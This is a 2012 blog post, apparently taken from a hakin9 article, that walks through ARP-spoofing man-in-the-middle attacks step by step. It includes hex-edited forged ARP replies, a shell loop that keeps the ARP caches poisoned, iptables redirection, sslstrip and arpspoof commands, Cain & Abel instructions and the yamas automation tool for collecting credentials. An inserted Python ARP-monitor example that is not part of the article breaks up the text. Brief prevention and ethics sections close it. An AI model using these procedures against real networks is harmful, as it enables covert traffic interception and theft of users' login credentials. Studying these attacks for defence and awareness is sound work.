Wednesday, June 20, 2012

Dangers of Man in the middle attacks to modern life


Overview
In the hakin9.org May release, I wrote more on the number of ways of performing MITM and also on how to steal information from an SSL channel. Read on for the content and enjoy the journey.

Dangers of Man in the middle attacks to modern life
In modern times we are all exposed through the use of computers, smart phones or any other device, all of which are connected in a consolidated network. When we use the word network, it means that we can communicate with the other party by sending information through cables or even through the air.


Introduction
Man in the middle attacks allow those of evil intent to gather information without the knowledge of either communicating party. If done properly, there is little to no sign of the attack, and because of that fact, additional weaknesses are exposed (think recovered usernames and passwords).
But of course, for those communications to be transmitted over the network between different pieces of equipment, there must be a standard or a framework. That model, the Open Systems Interconnection (OSI) model, is a reference model developed by ISO (the International Organization for Standardization) in 1984.
The OSI model divides the communication process into 7 layers, splitting the tasks involved in moving information between networked computers into seven smaller, more manageable task groups.
In a nutshell, layers 7 through 4 deal with end-to-end communication between the data source and the destination, while layers 3 to 1 deal with communication between network devices.

Explanation of 7 layer OSI in-short
Layer 1: Physical layer
Physical layer defines the cable or physical medium itself.
Layer 2 : Data link
The Data Link layer defines the format of data on the network. A network data frame, aka packet, includes a checksum, source and destination (MAC) addresses, and the data itself.
Layer 3 : Network
The network layer (IP) is responsible for routing, directing datagrams from one network to another.
Layer 4 : Transport
The Transmission Control Protocol (TCP) and the User Datagram Protocol (UDP) sit at the transport layer.
Layer 5 : Session
The session layer defines the format of the data sent over the connections and has a mechanism for opening, closing and managing a session between end-user application processes.
Layer 6 : Presentation
The presentation layer converts data into a canonical form, using a standard byte ordering and structure-packing convention independent of the host, and delivers the formatted information to the application layer for further processing or display.
Layer 7 : Application
Applications running on servers, such as HTTP, email, etc.

Why should we care?
At the beginning we talked about espionage, and now we are talking about the 7-layer OSI model; what does it have to do with the risk? From my point of view, there is another layer, layer 8, which refers back to the end users. Layer 8 doesn't exist in the OSI model, but in my opinion it should be part of it. Without user interaction, in some cases, how should we expect the data to be transmitted at all?
Humans are always the bottleneck in the security arena, because humans make mistakes, and this is where the problem is. Let me give you an example: if you are working in a corporate organization, I am pretty sure you are well protected in a very secure network environment. But do you think there is a chance that one of those users will use his or her laptop to access the internet on some other public network, such as at an airport or an internet café? Although the likelihood is low, do you think it could happen?

What is a MAC address?
A MAC address is the physical address of a network adapter; the Address Resolution Protocol (ARP), a network layer protocol, is used to convert an IP address into this physical address, which has the format MM:MM:MM:SS:SS:SS. The address is unique to each piece of computer hardware. It consists of 12 hexadecimal digits and is 48 bits in length. The first half of the address represents the adapter manufacturer. For example, in 00:A0:C9:11:22:33 the prefix 00:A0:C9 indicates that the manufacturer is Intel Corporation.
What brought my interest to this area was the security issue when you are running in a flat LAN environment, which I will explain in detail in this article. Let's get started with how Microsoft assigns the pool when Hyper-V is installed. The MAC address is divided into 2 parts; the first part is the manufacturer prefix I explained earlier. You can see the detail in figure 1.
00:15:5D:1A:2B:00

The first three octets (00:15:5D) are the Microsoft manufacturer prefix, but have you ever wondered where the next two octets (1A:2B) come from? Let me explain: say the IP address of the Hyper-V host is 10.208.26.43; take the last two octets, 26.43, convert them from decimal to hex, and you get 1A:2B.
This way, each time you deploy a Hyper-V host the MAC addresses won't be duplicated. The MAC address pool will therefore be a range like the one below (FF converted from hex to decimal is 255):
00:15:5D:1A:2B:00 to 00:15:5D:1A:2B:FF
Figure 1 : registry location to show the mac address pool

Where is the risk? I don't get it.
This is where the challenge comes into the picture: as perpetrators get more sophisticated day by day using the free tools available on the internet, they can launch a Man in the Middle attack, also known as MITM.
What it really does is impersonate someone on the network and become the middle man relaying information from the source to the destination. Used this way, it can also become a denial of service. I will explain in more detail as we go along through the technical how-to.
Principle of ARP Spoofing
To summarize, ARP spoofing can be used as a man in the middle attack or as a DDoS attack, since it can advertise a MAC address that does not exist on the network. The diagram below will give you some idea of it.
To give you more understanding of the packets, I decided to capture the information in my lab; it consists of different steps and stages.

Man In The Middle by the hard way

Stage 1: Collecting packet information
1) The tool we use in this lab is Wireshark; you can download it from the Wireshark Download Page.
2) After you have performed the installation, run Wireshark as in figure 2.
Figure 2: Running Wireshark

3) Configure the interface for capturing packets as in figure 3.
Figure 3: Configure interface

4) As shown on screen, you will need to check "Capture packets in promiscuous mode", which means sniffing mode.
Figure 4: Capture packets in promiscuous mode

5) After you have completed all the settings, click the start button and you will see some packets being captured.

6) You should be getting some packets as below; these are of interest for our next step, as in figure 5.
Figure 5: Result of info collection



Stage 2 : Analysis of the packet
1.   This is a sample of the relevant content of the file.
2.   Export the selected packet to /tmp/script/arp
3.   Edit the file by typing this command: hexedit -b /tmp/script/arp

Info           Bytes                Remark
Destination    00 50 56 F4 78 89    (GW) @ 192.168.18.2
Target IP      C0 A8 12 02          (GW) @ 192.168.18.2
Source         00 0C 29 F1 EF DB    (Hacker) @ 192.168.18.139
Sender IP      C0 A8 12 8B          (Hacker) @ 192.168.18.139
Victim         00 0C 29 13 80 DD    (Victim) @ 192.168.18.130
Victim IP      C0 A8 12 82          (Victim) @ 192.168.18.130

00000000   00 0C 29 F1 EF DB 00 50  56 F4 78 89 08 06 00 01   ..)....PV.x.....
00000010   08 00 06 04 00 02 00 50  56 F4 78 89 C0 A8 12 02   .......PV.x.....
00000020   00 0C 29 F1 EF DB C0 A8  12 8B 00 00 00 00 00 00   ..).............
00000030   00 00 00 00 00 00 00 00  00 00 00 00               ............

Stage 3: Modify the packet
1.   Start modifying the victim packet
2.   hexedit -b arp-victim
3.   Replace the hacker MAC address with the victim MAC address
4.   Replace the gateway MAC address with the hacker MAC address
Before changing the packet
00000000   00 0C 29 F1 EF DB 00 50  56 F4 78 89 08 06 00 01   ..)....PV.x.....
00000010   08 00 06 04 00 02 00 50  56 F4 78 89 C0 A8 12 02   .......PV.x.....
00000020   00 0C 29 F1 EF DB C0 A8  12 8B 00 00 00 00 00 00   ..).............
00000030   00 00 00 00 00 00 00 00  00 00 00 00               ............

After changing the packet
00000000   00 0C 29 13 80 DD 00 0C  29 F1 EF DB 08 06 00 01   ..)....)........
00000010   08 00 06 04 00 02 00 0C  29 F1 EF DB C0 A8 12 02   ........).......
00000020   00 0C 29 13 80 DD C0 A8  12 82 00 00 00 00 00 00   ..).............
00000030   00 00 00 00 00 00 00 00  00 00 00 00               ............

5.   Save the file as arp-victim and send it to the victim
6.   file2cable -v -i eth0 -f arp-victim

Summary of what has been modified (victim packet)

Field                        Before modification    After modification
Ethernet destination MAC     Hacker MAC             Victim MAC
Ethernet source MAC          Gateway MAC            Hacker MAC
EtherType / ARP header       unchanged              unchanged
ARP sender MAC               Gateway MAC            Hacker MAC
ARP sender IP                Gateway IP address     Gateway IP address
ARP target MAC               Hacker MAC             Victim MAC
ARP target IP                Hacker IP              Victim IP address
Padding                      unchanged              unchanged

Stage 4: Modify the gateway packet
1.   cp arp-victim arp-gateway
2.   hexedit -b arp-gateway

Before changing the packet
00000000   00 0C 29 13 80 DD 00 0C  29 F1 EF DB 08 06 00 01   ..)....)........
00000010   08 00 06 04 00 02 00 0C  29 F1 EF DB C0 A8 12 02   ........).......
00000020   00 0C 29 13 80 DD C0 A8  12 82 00 00 00 00 00 00   ..).............
00000030   00 00 00 00 00 00 00 00  00 00 00 00               ............

After changing the packet
00000000   00 50 56 F4 78 89 00 0C  29 F1 EF DB 08 06 00 01   .PV.x..)........
00000010   08 00 06 04 00 02 00 0C  29 F1 EF DB C0 A8 12 82   ........).......
00000020   00 50 56 F4 78 89 C0 A8  12 02 00 00 00 00 00 00   .PV.x...........
00000030   00 00 00 00 00 00 00 00  00 00 00 00               ............

Stage 5: Enable IP forwarding
1.   As explained earlier, if this step is not configured, the attack up to stage 4 becomes a denial of service. But of course you don't want that to happen, because your intention is to collect information.
2.   What you need to do next is enable IP forwarding on the BackTrack machine itself. In layman's terms, it enables the routing function on the machine so that the packets can be forwarded.
echo 1 > /proc/sys/net/ipv4/ip_forward
nano doarp.sh
chmod 700 doarp.sh
#!/bin/bash
# Re-send both forged ARP replies every 2 seconds so that the poisoned
# entries in the victim's and the gateway's ARP caches do not expire.
while [ 1 ]; do
    file2cable -i eth0 -f arp-victim
    file2cable -i eth0 -f arp-gateway
    sleep 2
done


Summary of what has been modified (gateway packet)

Field                        Before modification    After modification
Ethernet destination MAC     Victim MAC             Gateway MAC
Ethernet source MAC          Hacker MAC             Hacker MAC
EtherType / ARP header       unchanged              unchanged
ARP sender MAC               Hacker MAC             Hacker MAC
ARP sender IP                Gateway IP address     Victim IP address
ARP target MAC               Victim MAC             Gateway MAC
ARP target IP                Victim IP              Gateway IP
Padding                      unchanged              unchanged

Stage 6: Wait & monitor
This is the last step: monitor your Wireshark capture and look for any login ID with a password. But if the users are using an encrypted channel, you won't be able to see the content.
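The same two symptoms that stages 3 to 5 produce (one IP address suddenly answering from a different MAC, and one MAC claiming more than one IP) are what a passive ARP monitor on the segment looks for. The following is an added example, not code from the article or from any of the tools it names: it decodes the three frames from the hex dumps above (constructed from those dumps) and runs an arpwatch-style check over them.

```python
import struct
from ipaddress import IPv4Address

# Frames constructed from the article's hex dumps: the genuine reply the
# gateway (00:50:56:f4:78:89, 192.168.18.2) sent to the attacker's host
# (00:0c:29:f1:ef:db, 192.168.18.139), then the two forged replies aimed
# at the victim (00:0c:29:13:80:dd, 192.168.18.130) and at the gateway.
GENUINE_REPLY = bytes.fromhex(
    "000c29f1efdb005056f4788908060001080006040002005056f47889c0a81202"
    "000c29f1efdbc0a8128b000000000000000000000000000000000000")
FORGED_TO_VICTIM = bytes.fromhex(
    "000c291380dd000c29f1efdb08060001080006040002000c29f1efdbc0a81202"
    "000c291380ddc0a81282000000000000000000000000000000000000")
FORGED_TO_GATEWAY = bytes.fromhex(
    "005056f47889000c29f1efdb08060001080006040002000c29f1efdbc0a81282"
    "005056f47889c0a81202000000000000000000000000000000000000")


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_arp(frame):
    """Decode an Ethernet II frame carrying ARP (RFC 826) into its fields."""
    if len(frame) < 42:
        raise ValueError("too short for Ethernet + ARP")
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x0806:
        raise ValueError(f"not ARP (EtherType 0x{ethertype:04x})")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("only Ethernet/IPv4 ARP is handled")
    return {
        "eth_dst": mac(frame[0:6]), "eth_src": mac(frame[6:12]),
        "op": op,  # 1 = request, 2 = reply
        "sender_mac": mac(frame[22:28]),
        "sender_ip": str(IPv4Address(frame[28:32])),
        "target_mac": mac(frame[32:38]),
        "target_ip": str(IPv4Address(frame[38:42])),
    }


class ArpWatch:
    """Passive monitor: remembers which MAC each IP has claimed and which
    IPs each MAC has claimed, and reports the two symptoms of the attack."""

    def __init__(self):
        self.ip_to_mac = {}   # ip -> last MAC seen answering for it
        self.mac_to_ips = {}  # mac -> set of IPs it has claimed

    def observe(self, frame):
        a = parse_arp(frame)
        if a["op"] != 2:          # only replies change ARP caches
            return []
        alerts = []
        ip, hw = a["sender_ip"], a["sender_mac"]
        prev = self.ip_to_mac.get(ip)
        if prev is not None and prev != hw:
            alerts.append(f"{ip} moved from {prev} to {hw}")
        self.ip_to_mac[ip] = hw
        claimed = self.mac_to_ips.setdefault(hw, set())
        claimed.add(ip)
        if len(claimed) > 1:
            alerts.append(f"{hw} claims {len(claimed)} IPs: {sorted(claimed)}")
        return alerts
```

Feeding the genuine reply first and then the two forged ones raises an alert for each forged frame; in a real deployment the frames would come from a capture on the LAN segment rather than from constants.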

Man In The Middle: the new trend
After looking at the hard way of doing MITM, do you think you would use it? The effort involved is quite a lot and mistakes can happen, so the chances of success might be low. The reality is that this is how people did it a long time ago.
Practically no one will do it the hard way, but it is good to understand in depth how ARP spoofing really works. The soft way I will mention here comes in 2 flavours, one more oriented towards Windows environments and the other towards Linux environments. I will pick the most common targets that perpetrators go after in order to get the information they want, and from there you can explore in more detail.

Building a MITM attacker machine on Windows
I think most users are on Windows, and they are more comfortable using Windows as the machine to perform an attack. To build such a machine there are certain things that you must know. First, don't ever install an antivirus on that machine, as the antivirus will remove the files. Second, don't ever use that machine to surf the internet, to avoid any potential viruses on the machine. The third point is which OS is the preferred option: most of the software runs pretty well on Windows XP, so this is the recommended choice.

But you must also take note that this OS is soon going to reach the end of its life.
Since we are focusing on the man in the middle attack, the favourite tool to use is Cain & Abel. If you read the Bible, you will notice the name comes from the two sons of Adam & Eve. But today I am not asking you to read the Bible; I am going to explain the tool.
The tool was developed in the hope that it would be useful to network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration testers and everyone else who plans to use it for ethical reasons. But most of the time, the tool has been used for crime.
The tools can do a lot of damage which include the following:

1.   WEP cracking
2.   Speeding up packet capture speed by wireless packet injection
3.   Ability to record VoIP conversations
4.   Decoding scrambled passwords
5.   Calculating hashes
6.   Traceroute
7.   Revealing password boxes
8.   Uncovering cached passwords
9.   Dumping protected storage passwords
10.  ARP spoofing
11.  IP to MAC Address resolver
12.  Network Password Sniffer

Let's get started
As per figure 6, this is how Cain & Abel looks; the GUI is user friendly and you can have all the information required in just a few clicks.
Figure 6: Cain & Abel

The first thing you must do is identify your IP address by typing ipconfig /all in your command prompt.

The next step is to click the icon to activate Cain & Abel's sniffer, click ARP, start sniffing, open the Sniffer tab, and scan the MAC addresses of the entire network.

Wait until the sniffing process is complete, then click the ARP tab at the bottom and click the "+" sign; a new window will pop up consisting of two columns. Now is the time to "hack": click the server IP in the left column and click the IP address of the victim on the right, and repeat against all targets. In most cases we will target all of them, as we don't know which machine belongs to whom. Remember, don't run this in your production environment as it could do a lot of damage.

What happens in the background is that the tool starts a poisoning attack against the victim IP addresses. If during that time the users are surfing the internet via HTTP or similar, you will be able to see the credentials on the Passwords tab. I am not against this tool, but if a user visits an HTTPS website, the user will get a prompt asking whether they want to continue to the website. The chance that the user clicks on continue is high, but then again, I believe we could do better. The tool also generates a certificate on behalf of the real origin website, so why does the user still get a prompt? This is because the certificate has a different thumbprint. In your corporate organization, if you are using some sort of proxy with its own certificate and you have trusted that proxy certificate, the same mechanism means your user ID can be captured. So take note of this too.

Building a MITM attacker machine on Linux
The approach is almost the same as for Windows, but of course on Linux you should expect more text than GUI. There are 2 approaches we can take here: the first is semi-automatic and the second is fully automatic.
In the first approach you still need to do some manual work, such as configuring the machine to route the traffic, some firewall rules and reading the logs. I will explain why this is not a good approach as we go into detail.

To enable the routing function we must change a value in /proc as below:

echo 1 > /proc/sys/net/ipv4/ip_forward

The next step is to configure all incoming requests to be diverted; you can use any destination port that you like:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 12345

Now this is where the real work starts: you will need to use the terminal and
cd to /pentest/web/sslstrip, as we need to run a Python script from there.

To view all the available options you can type the following command:

python sslstrip.py --help
Options:
 -w  Specify file to log to
 -p  Log only SSL POSTs
 -s  Log all SSL and HTTP traffic to and from server
 -l  Port to listen on
 -f  Substitute a lock favicon
 -k  Kill sessions in progress
 -h  Print help message

To start the tool, run the command as below:
python sslstrip.py -l 12345

Now we need to start the MITM process. You may have noticed that the process is getting simpler and easier: from manually changing bytes we have moved to a command that does the spoofing for us.

arpspoof -i eth0 -t Victim_IP Gateway_IP

Once the client starts surfing the internet, all the logs will be captured in sslstrip.log. You can view the changes in real time using the tail command as shown below:

tail -f sslstrip.log

In reality this will only work in a smaller environment; if too many users are visiting websites, you may want to use other commands such as grep to pick out the information you would like to see.

What would be the next evolution?
As you have read through the different steps, whether the manual way, on Windows machines or on Linux, do you notice that the tools are getting smarter as time goes on? The steps I show below are fully automated, and thanks go to the developer who created this tool. Then again, from a security standpoint you can't differentiate between real and fake anymore, and cybercrime can be expected to increase.
The tool is known as yamas and is available for download from comax.fr/yamas.php . Yamas is a tool that aims at facilitating man in the middle attacks by automating the whole process, from setting up IP forwarding and modifying iptables to the ARP cache poisoning (using either ettercap or arpspoof). The traffic is stripped of SSL with the famous sslstrip 0.9.
All you need to do is run the command yamas and wait for the result. When you first run the command, it will ask where the traffic should be diverted to, as shown below. Select the default and press enter.
what port should the traffic be redirect to? (Default = 8080)
The second screen you will see asks for the gateway IP; by default it will detect the range for you automatically. Press enter to proceed.

Enter Ip gateway address or press enter to use x.x.x.x

After that you will be prompted to select the interface. Press enter to use the default value.

what interface would you like to use . It should match IP gateway as shown above

By default we will target the entire network, so just press enter.
We will target the whole network as default, press 0 for manual

All that is left is to wait, and the credentials will be populated on your screen.

Prevention
Having read all the steps, it might look difficult to protect against a layer 2 attack. But some vendor products do provide protection against the attack, such as Cisco's Dynamic ARP Inspection. You must be aware that not every location can afford to have prevention devices in place, public networks for example. This is why security awareness should be in place to guide users on what they are allowed to do when they are on a public network. There is no such thing as a patch for humans; they need to be educated.

Note on ethics
Our intention when we started writing these articles was to give an overview of what tools exist on the market and how we can use them to secure our organization against unidentified threats. When you start to use the tools above, please make sure you keep this with you:
1.   Don't use this for any malicious intention
2.   Don't attack any organization without approval from top management
3.   Think of the damage that you might cause

Conclusion
In this article we have presented how to perform a man in the middle attack on Linux as well as on Windows machines. We have shown the trick of hiding in the network while performing intelligent information gathering. The author has also shown a common attack as it is commonly performed by attackers, and how fast they can obtain information in a stealthy way. As you can see, the growth of these tools can help anyone become a security pen tester, while in the wrong hands they can do more damage than good. Such attacks are much easier to perform and more likely to succeed. The author sincerely hopes that these short articles can increase awareness among anyone handling computer or security services. In the broader sense, we hope that the information can help you increase the security of your organization's assets.

Summary
Stay tuned for my next articles. Let us know what you thought, what you learned and what you hope for in the next articles! Connect with us on GOOGLE+, TWITTER and FACEBOOK.
